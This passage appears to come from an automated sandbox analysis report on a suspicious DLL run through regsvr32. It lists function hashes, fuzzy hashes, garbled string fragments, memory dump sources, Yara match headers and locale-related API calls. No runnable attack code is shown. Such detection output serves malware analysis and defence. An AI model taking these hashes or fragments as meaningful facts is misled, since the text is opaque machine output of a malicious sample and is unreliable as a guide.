                                                                                                                            • String ID: {H2}$}i#c
                                                                                                                            • API String ID: 0-1724349491
                                                                                                                            • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                            • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                                                                            • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                            • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4V$so
                                                                                                                            • API String ID: 0-1060102820
                                                                                                                            • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                            • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                                                                            • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                            • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F+'$O$
                                                                                                                            • API String ID: 0-4064122715
                                                                                                                            • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                            • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                                                                            • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                            • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$bO6
                                                                                                                            • API String ID: 0-3242911120
                                                                                                                            • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                            • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                                                                            • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                            • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: )j-J$\rba
                                                                                                                            • API String ID: 0-105394296
                                                                                                                            • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                            • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                                                                            • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                            • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5T$7c
                                                                                                                            • API String ID: 0-2666566123
                                                                                                                            • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                            • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                                                                            • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                            • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                            • Instruction ID: 15f8f799faac0135f1830bc9c5449ddc4a1b2515e8296b638f0d6e49feaa9784
                                                                                                                            • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                            • Instruction Fuzzy Hash: DE119832A0C5AACDEA785B65E4553B9A650EB8878CF444035DACD8E281CE1CE546EB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099609381-0
                                                                                                                            • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                            • Instruction ID: 70115875d5970513b8a333318cb7cd49f251c8bfcd7edcfb91bdaf25a8bd02fd
                                                                                                                            • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                            • Instruction Fuzzy Hash: D7115E72A0C619CEFB1C8A31C0153796A90FB94B09F044436C68D4A285CB7CD594EAA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFC66D75A8C), ref: 00007FFC66D7C8FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099609381-0
                                                                                                                            • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                            • Instruction ID: bcf569d6264551099b5b3ac4df9d7c9f1e9de546d2e4d84158656fc661dc4c07
                                                                                                                            • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                            • Instruction Fuzzy Hash: 02F0F462E0C51ECEF75C8A31C0153B9ABD1ABA4B09F188031C68D4A2C6CF6CC590EA52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3731964398-0
                                                                                                                            • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                            • Instruction ID: e153fcd99ef9f3d08aedf82208ffa118d91ae2bed1502dccdc47c909248397ab
                                                                                                                            • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                            • Instruction Fuzzy Hash: 00F0BE22A086D083D7118B0AF00406AEB60FBC4BE4F684230EA9D0BB99CE2CC842CF40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                            • Instruction ID: c75854cba07d3121b91e7c1d942956fcfffd21b8eda743fd9a1cd52c8ae989b6
                                                                                                                            • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                            • Instruction Fuzzy Hash: F2E0E521A1C5C5C1F6349711E8013AA6B50FF9875CF900235DACC4E7A0CE2CD201DF22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099609381-0
                                                                                                                            • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                            • Instruction ID: aaaa9fa5a78fe5df0ace3e3b6a4b99f28789d257a64ca28c5ec28500e45cbcae
                                                                                                                            • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                            • Instruction Fuzzy Hash: C3E08667E0D609CAEB1C8F62D4443747691EF94B09F088035CA4C05295DF7CC596DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: cYte
                                                                                                                            • API String ID: 0-489798635
                                                                                                                            • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                            • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                                                                            • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                            • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Pc
                                                                                                                            • API String ID: 0-2609325410
                                                                                                                            • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                            • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                                                                            • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                            • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: xDC
                                                                                                                            • API String ID: 0-90241050
                                                                                                                            • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                            • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                                                                            • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                            • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: g >
                                                                                                                            • API String ID: 0-3862707646
                                                                                                                            • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                            • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                                                                            • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                            • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 2
                                                                                                                            • API String ID: 0-2012265552
                                                                                                                            • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                            • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                                                                            • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                            • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Wcl
                                                                                                                            • API String ID: 0-2623992880
                                                                                                                            • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                            • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                                                                            • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                            • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ws8
                                                                                                                            • API String ID: 0-2196714860
                                                                                                                            • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                            • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                                                                            • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                            • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p/g
                                                                                                                            • API String ID: 0-1786412500
                                                                                                                            • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                            • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                                                                            • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                            • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %
                                                                                                                            • API String ID: 0-3714942587
                                                                                                                            • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                            • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                                                                            • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                            • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: A.}
                                                                                                                            • API String ID: 0-2880059976
                                                                                                                            • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                            • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                                                                            • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                            • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0#
                                                                                                                            • API String ID: 0-456275806
                                                                                                                            • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                            • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                                                                            • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                            • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: n)
                                                                                                                            • API String ID: 0-1227437150
                                                                                                                            • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                            • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                                                                            • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                            • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H&0
                                                                                                                            • API String ID: 0-1691334370
                                                                                                                            • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                            • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                                                                            • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                            • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
